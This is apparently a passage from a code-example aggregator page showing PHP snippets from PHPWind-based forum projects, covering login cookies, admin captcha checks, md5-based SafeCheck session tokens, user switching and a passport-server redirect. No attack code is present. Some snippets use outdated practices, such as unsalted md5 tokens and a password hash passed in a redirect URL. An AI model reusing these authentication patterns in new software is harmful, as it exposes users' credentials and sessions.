     } else {
         if ($backtype) {
             adminmsg('topic_search_none', "{$basename}&action=topic&modelid={$modelid}");
         }
         Showmsg('topic_search_none');
     }
     return array($count, $tiddb, $alltiddb);
 }

コード例 #24

ファイル: login.php プロジェクト: adi00/wumaproject

 $logininfo = checkpass($pwuser, $md5_pwpwd, $safecv, $lgt);
 if (!is_array($logininfo)) {
     Showmsg($logininfo);
 }
 list($winduid, $groupid, $windpwd, $showmsginfo) = $logininfo;
 /*update cache*/
 $_cache = getDatastore();
 $_cache->delete("UID_" . $winduid);
 if (file_exists(D_P . "data/groupdb/group_{$groupid}.php")) {
     require_once Pcv(D_P . "data/groupdb/group_{$groupid}.php");
 } else {
     require_once D_P . "data/groupdb/group_1.php";
 }
 (int) $keepyear && ($cktime = '31536000');
 $cktime != 0 && ($cktime += $timestamp);
 Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $safecv), $cktime);
 Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
 //Cookie("ucuser",'cc',$cktime);
 Cookie('lastvisit', '', 0);
 //将$lastvist清空以将刚注册的会员加入今日到访会员中
 if ($db_autoban) {
     require_once R_P . 'require/autoban.php';
     autoban($winduid);
 }
 $_G['allowhide'] && $hideid ? Cookie('hideid', "1", $cktime) : Loginipwrite($winduid);
 (empty($jumpurl) || false !== strpos($jumpurl, $regurl)) && ($jumpurl = $db_bfn);
 if (GetCookie('o_invite') && $db_modes['o']['ifopen'] == 1) {
     list($o_u, $hash, $app) = explode("\t", GetCookie('o_invite'));
     if (is_numeric($o_u) && strlen($hash) == 18) {
         require_once R_P . 'require/o_invite.php';
     }

コード例 #25

ファイル: admincp.php プロジェクト: adi00/wumaproject

function GdConfirm($code, $t = 1)
{
    Cookie('cknum', '', 0);
    if (!$code || !SafeCheck(explode("\t", StrCode(GetCookie('cknum'), 'DECODE')), strtoupper($code), 'cknum', 300)) {
        global $basename, $admin_file;
        $t && Cookie('AdminUser', '', 0);
        $basename = $admin_file;
        adminmsg('check_error');
    }
}

コード例 #26

ファイル: pm_core_functions.php プロジェクト: Zniel/fl_crtlpanel_self_dev

function SafeCheck($CK, $PwdCode, $var = 'FLAdminUser', $expire = 1800)
{
    // 验证密码
    global $timestamp;
    $t = $timestamp - $CK[0];
    if ($t > $expire || $CK[2] != md5($PwdCode . $CK[0])) {
        Cookie($var, '', 0);
        return false;
    } else {
        $CK[0] = $timestamp;
        $CK[2] = md5($PwdCode . $timestamp);
        $Value = implode("\t", $CK);
        ${$var} = StrCode($Value);
        Cookie($var, StrCode($Value));
        return true;
    }
}

コード例 #27

ファイル: switchuser.php プロジェクト: jechiy/PHPWind

!defined('P_W') && exit('Forbidden');
S::gp(array('uid'));
$db_logintype = 2;
require_once R_P . 'require/checkpass.php';
$id = $db->get_value("SELECT id FROM pw_userbinding WHERE uid=" . S::sqlEscape($winduid));
$user = $db->get_one("SELECT s.password,m.uid,m.safecv FROM pw_userbinding s LEFT JOIN pw_members m ON s.uid=m.uid WHERE s.id=" . S::sqlEscape($id) . ' AND s.uid=' . S::sqlEscape($uid));
$logininfo = checkpass($user['uid'], $user['password'], $user['safecv'], 1);
if (!is_array($logininfo)) {
    switch ($logininfo) {
        case 'login_forbid':
        case 'login_pwd_error':
            Showmsg('switchuser_error');
        default:
            Showmsg($logininfo);
    }
}
list($winduid, $groupid, $windpwd, $showmsginfo) = $logininfo;
$cktime = 7 * 24 * 3600;
(int) $keepyear && ($cktime = 31536000);
$cktime != 0 && ($cktime += $timestamp);
Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $user['safecv']), $cktime);
Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
//Cookie("ucuser",'cc',$cktime);
Cookie('lastvisit', '', 0);
//鑾峰彇鍕嬬珷_start
require_once R_P . 'require/functions.php';
doMedalBehavior($winduid, 'continue_login');
//鑾峰彇鍕嬬珷_end
echo "ok\t{$showmsginfo}";
ajax_footer();

コード例 #28

ファイル: common.php プロジェクト: adi00/wumaproject

function SafeCheck($CK, $PwdCode, $var = 'AdminUser', $expire = 1800)
{
    global $timestamp;
    if ($timestamp - $CK[0] > $expire || $CK[2] != md5($PwdCode . $CK[0])) {
        Cookie($var, '', 0);
        return false;
    }
    $CK[0] = $timestamp;
    $CK[2] = md5($PwdCode . $CK[0]);
    Cookie($var, StrCode(implode("\t", $CK)));
    return true;
}

コード例 #29

ファイル: passport_server.php プロジェクト: sherlockhouse/aliyun

if (!$db_pptifopen || $db_ppttype != 'server') {
    Showmsg('passport_close');
}
$jumpurl = str_replace('=', '=', $jumpurl);
$userdb = array();
$userService = L::loadClass('UserService', 'user');
/* @var $userService PW_UserService */
$rt = $userService->get($winduid, true, true);
$userdb['uid'] = $rt['uid'];
$userdb['username'] = $rt['username'];
$userdb['password'] = $rt['password'];
$userdb['email'] = $rt['email'];
$userdb['rvrc'] = $rt['rvrc'];
$userdb['money'] = $rt['money'];
$userdb['credit'] = $rt['credit'];
$userdb['currency'] = $rt['currency'];
$userdb['time'] = $timestamp;
$userdb['cktime'] = $cktime ? $cktime : 'F';
$userdb_encode = '';
foreach ($userdb as $key => $val) {
    $userdb_encode .= $userdb_encode ? "&{$key}={$val}" : "{$key}={$val}";
}
$db_hash = $db_pptkey;
$userdb_encode = str_replace('=', '', StrCode($userdb_encode));
if ($action == 'login') {
    $verify = md5("login{$userdb_encode}{$forward}{$db_pptkey}");
    ObHeader("{$jumpurl}/passport_client.php?action=login&userdb=" . rawurlencode($userdb_encode) . "&forward=" . rawurlencode($forward) . "&verify=" . rawurlencode($verify) . "&ajax={$ajax}");
} elseif ($action == 'quit') {
    $verify = md5("quit{$userdb_encode}{$forward}{$db_pptkey}");
    ObHeader("{$jumpurl}/passport_client.php?action=quit&userdb=" . rawurlencode($userdb_encode) . "&forward=" . rawurlencode($forward) . "&verify=" . rawurlencode($verify));
}

コード例 #30

ファイル: global.php プロジェクト: adi00/wumaproject

function GdConfirm($code)
{
    Cookie('cknum', '', 0);
    if (!$code || !SafeCheck(explode("\t", StrCode(GetCookie('cknum'), 'DECODE')), strtoupper($code), 'cknum', 1800)) {
        Showmsg('check_error');
    }
}